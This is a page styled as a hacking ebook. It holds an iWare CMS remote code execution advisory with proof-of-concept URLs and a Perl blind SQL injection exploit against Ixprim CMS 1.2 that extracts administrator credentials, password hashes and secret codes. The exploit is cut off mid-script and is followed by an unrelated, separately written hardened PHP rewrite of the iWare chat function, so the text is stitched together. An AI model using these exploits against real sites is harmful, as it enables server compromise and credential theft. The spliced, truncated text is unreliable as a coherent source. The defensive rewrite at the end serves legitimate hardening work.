Hacker Professional Ebook part 387 pdf


iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability

Affected Software : iWare Professional CMS <= 5.0.4
Vendor            : http://www.dsiware.com/
Download          : http://dsiware.com/download.php
Description       : "iWare is an Open Source PHP & MySQL Content Management System"
Class             : Remote Code Execution
Risk              : High (Remote Code Execution)
Found By          : nuffsaid <nuffsaid[at]newbslove.us>

Details:
iWare admin/mods/simplechat_1.0.0/chat_panel.php does not sanitize the $message variable
in the first argument of the PostMessage() function on line 11 before writing the variable
contents to chat_log.php on line 25. When chat_panel.php is requested, the PostMessage()
function is called on line 32 and $_REQUEST['msg'] is written to chat_log.php unsanitized.
Because the destination file has a .php extension, anything written into it is executed by
the server the next time chat_log.php is requested.

Vulnerable Code:
admin/mods/simplechat_1.0.0/chat_panel.php, line(s) 11-32:
-> 11: function PostMessage($message) {
-> 16:     $new_message = "".$message."<br />\n";
-> 23:     $open_file = fopen("chat_log.php", "w");
-> 25:     fputs($open_file, stripslashes($new_message));
-> 28:     fclose($open_file);
-> 29: }
-> 32: if($_REQUEST['talk']==1){PostMessage($_REQUEST['msg']);}

Proof Of Concept:
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=[evilcode]
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php

Black_hat_cr(HCE)

Ixprim CMS 1.2 Remote Blind SQL Injection Exploit Code:

#!/usr/bin/perl
#
# INFORMATIONS
# ============
# Affected.scr : Ixprim 1.2
# Poc.ID       : 16061221
# Type         : Blind SQL Injection
# Risk.level   : Medium
# Conditions   : load_file privilege (ixp code only)
# Src.download : www.ixprim-cms.org
# Poc.link     : acid-root.new.fr/poc/16061221.txt
# Credits      : DarkFig
#
#
# SCREENSHOT
# ==========
# header> Ixprim 1.2 Remote Blind SQL Injection Exploit
# header> =============================================
# status> Searching if someone posted a comment
# sploit> story_id=2
# status> Searching the administrator's uid
# sploit> 1
# status> Searching the administrator's username length
# sploit> 4
# status> Searching the administrator's username
# sploit> root
# status> Searching the administrator's password hash
# sploit> 7b24afc8bc80e548d66c4e7ff72171c5
# status> Searching a full path disclosure
# sploit> /home/www/ixprim-1.2/html/mainfile.php
# status> Searching the confidential ixp code
# sploit> c998aa6188034690aab6565c0099fe0a
#

use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Response;
use Getopt::Long;

print STDOUT "\n header> Ixprim 1.2 Remote Blind SQL Injection Exploit";
print STDOUT "\n header> =============================================\n";

my $opt = GetOptions(
    'host=s'  => \$host,
    'path=s'  => \$path,
    'proxh=s' => \$proxh,
    'proxu=s' => \$proxu,
    'proxp=s' => \$proxp);

if(!$host) {
    print STDOUT " header> Usage  : xpl.pl -host [host] -path [path]\n";
    print STDOUT " header> Options: -proxh [host] -proxu [user] -proxp [pass]\n";
    exit(1);
}

$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";

my $ua = LWP::UserAgent->new();
$ua->agent('r00xzilla');
$ua->timeout(30);
$ua->proxy('[http]' => $proxh) if $proxh;

my $req = HTTP::Request->new(GET => $host.$path.'ixm_ixpnews.php');
$req->proxy_authorization_basic($proxu,$proxp) if $proxu;
$res = ($ua->request($req))->content;

print STDOUT " status> Searching if someone posted a comment\n";

# There is more than one SQL injection, but this one is the most
# interesting to exploit. The parameter 'story_id' isn't properly
# sanitised before being used in an SQL query. URL rewriting option
# supported.
#
if($res =~ /(story_id=||news-art)([0-9]+)(||.html)">([0-9]+) (commentaire||comment)/) {
    $story_id = $2;
    $bsql = $host.$path."ixm_ixpnews.php?file=article&story_id=$story_id";
    print STDOUT " sploit> story_id=$story_id\n";
} else {
    print STDOUT " status> No comment posted\n\n";
    exit(1);
}

print STDOUT " status> Searching the administrator's uid\n";
$uid = sendreq(1,1,"select%20uid%20from%20ixp_users%20order%20by%20uid%20limit%200,1");

print STDOUT " status> Searching the administrator's username length\n";
$admlg = sendreq(1,3,"length((select%20uname%20from%20ixp_users%20where%20uid=$uid))");

print STDOUT " status> Searching the administrator's username\n";
&sendreq(1,$admlg,"select%20uname%20from%20ixp_users%20where%20uid=$uid");

print STDOUT " status> Searching the administrator's password hash\n";
&sendreq(1,32,"select%20pass%20from%20ixp_users%20where%20uid=$uid");

print STDOUT " status> Searching a full path disclosure";
$req = GET $host.$path.'kernel/plugins/fckeditor2/ixprim_api.php';
$res = ($ua->request($req))->content;
if($res =~ /in <b>(.*?)kernel(\/||\\)/) {
    $fpd = $1.'mainfile.php';
    print STDOUT "\n sploit> $fpd\n";
} else {
    print STDOUT "\n status> Can't get the full path disclosure";
    exit(1);
}

# A personal code stored in mainfile.php protects the administration panel:
#
# // Code personnel CMS
# define("IXP_CODE", 'c998aa6188034690aab6565c0099fe0a');
#
# This code is generated by the function code() stored in install.fct.php:
#
# function code($param='1')
# {
#     $number = rand(1,1024);
#     $temp   = md5(($number*time()).$param);
#     $temp   = substr($temp, 0, 8);
#     return $temp;
# }
#
# $param = $host.$path, and $temp can be modified by the user.
# After the request is sent, the script creates the SQL tables, and the time()
# at which it created them is stored in the MySQL database; we can retrieve it with the SQL
# injection and, IF the user did not modify the generated code, we can find the personal code.
# The time of the table creation and the time of the code generation
# are not the same, but we can try to bruteforce it with some parameters.
# But the user can change the generated code, which is why I decided to use the SQL
# injection with load_file and regexp.
#
print STDOUT " status> Searching the confidential ixp code\n";
# Example with "C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php"
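A hardened rewrite of the iWare PostMessage() flow described in the first advisory above, as an added example that is not iWare's code or the advisory author's: the message is bounded and HTML-encoded, appended to a plain-text data file outside the web root instead of being written into chat_log.php, and only accepted via POST. The log path, the length limit and the file names are assumptions.

```php
<?php
// Hardened rewrite of simplechat's PostMessage() (added example, not iWare's
// code). Assumptions: the data directory, file names and limit are hypothetical.
declare(strict_types=1);

// Plain-data log OUTSIDE the web root: the web server never parses it as PHP,
// so stored content can never execute the way chat_log.php could.
const CHAT_LOG       = __DIR__ . '/../../../../chat_data/chat_log.txt'; // hypothetical
const MAX_MESSAGE_LEN = 1000;

// Neutralise a raw message: reject empties and control characters, bound the
// length, and HTML-encode so "<?php", "<script>" etc. survive only as inert text.
function sanitizeMessage(string $message): ?string
{
    $message = trim($message);
    if ($message === '' || mb_strlen($message, 'UTF-8') > MAX_MESSAGE_LEN) {
        return null;
    }
    if (preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $message)) {
        return null;                       // control characters: reject outright
    }
    return htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Append one encoded line to the data log: never a .php file, never a "w"
// overwrite of something the server will execute.
function PostMessage(string $message): bool
{
    $safe = sanitizeMessage($message);
    if ($safe === null) {
        return false;
    }
    return file_put_contents(CHAT_LOG, $safe . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// Render the log as text. Lines are already encoded, so this only turns
// newlines into <br> and never includes or requires the file as code.
function renderChatLog(): string
{
    if (!is_file(CHAT_LOG)) {
        return '';
    }
    return nl2br((string) file_get_contents(CHAT_LOG), false);
}

// State changes only via POST; $_REQUEST (GET/cookie) is no longer honoured,
// so a crafted link alone can no longer write to the log.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['talk'] ?? '') === '1') {
    PostMessage((string) ($_POST['msg'] ?? ''));
}
echo renderChatLog();
```

The same defect pattern is worth checking for elsewhere in a code base: any fopen()/file_put_contents() whose target name ends in .php and whose content derives from request data.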

Posted: 04/07/2014, 12:20
